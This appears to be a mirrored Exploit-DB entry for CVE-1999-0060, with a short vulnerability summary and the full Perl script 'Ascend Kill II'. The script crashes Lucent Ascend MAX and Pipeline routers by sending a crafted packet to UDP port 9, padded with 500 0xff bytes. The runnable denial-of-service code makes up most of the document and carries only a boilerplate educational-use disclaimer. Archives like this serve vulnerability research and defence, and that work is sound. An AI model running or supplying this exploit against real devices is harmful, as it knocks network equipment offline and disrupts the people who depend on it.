- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19555
- Проверка EDB
-
- Пройдено
- Автор
- ROOTSHELL
- Тип уязвимости
- REMOTE
- Платформа
- HARDWARE
- CVE
- cve-1999-0060
- Дата публикации
- 1998-03-17
Lucent Ascend MAX 5.0/Pipeline 6.0/TNT 1.0/2.0 Router - MAX UDP Port 9 (2)
Код:
source: https://www.securityfocus.com/bid/714/info
Certain versions of Ascends (Lucent) router software listen on port 9 (UDP Discard). Ascend provides configuration tools for MAX and Pipeline routers that locate locally installed routers by broadcasting a specially formatted packet to UDP port 9. An attacker can send a similar but malformed packet to the same port that will cause MAX and Pipeline routers running certain software versions to crash.
#!/usr/bin/perl
#
# Ascend Kill II - perl version
# (C) 1998 Rootshell - http://www.rootshell.com/ - <[email protected]>
#
# Released: 3/17/98
#
# Thanks to Secure Networks. See SNI-26: Ascend Router Security Issues
# (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html)
#
# NOTE: This program is NOT to be used for malicous purposes. This is
# intenteded for educational purposes only. By using this program
# you agree to use this for lawfull purposes ONLY.
#
#
use Socket;
require "getopts.pl";
sub AF_INET {2;}
sub SOCK_DGRAM {2;}
sub ascend_kill {
$remotehost = shift(@_);
chop($hostname = `hostname`);
$port = 9;
$SIG{'INT'} = 'dokill';
$sockaddr = 'S n a4 x8';
($pname, $aliases, $proto) = getprotobyname('tcp');
($pname, $aliases, $port) = getservbyname($port, 'tcp')
unless $port =~ /^\d+$/;
($pname, $aliases, $ptype, $len, $thisaddr) =
gethostbyname($hostname);
$this = pack($sockaddr, AF_INET, 0, $thisaddr);
($pname, $aliases, $ptype, $len, $thataddr) = gethostbyname($remotehost);
$that = pack($sockaddr, AF_INET, $port, $thataddr);
socket(S, &AF_INET, &SOCK_DGRAM, 0);
$msg = pack("c64",
0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00,
0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e,
0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53,
0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44,
0x50, 0x41, 0x53, 0x53);
for ($i=0; $i<500; $i++) {
$msg .= pack("c1", 0xff);
}
send(S,$msg,0,$that) || die "send:$!";
}
if ($ARGV[0] eq '') {
print "usage: akill2.pl <remote_host>\n";
exit;
}
&ascend_kill($ARGV[0]);
- Источник
- www.exploit-db.com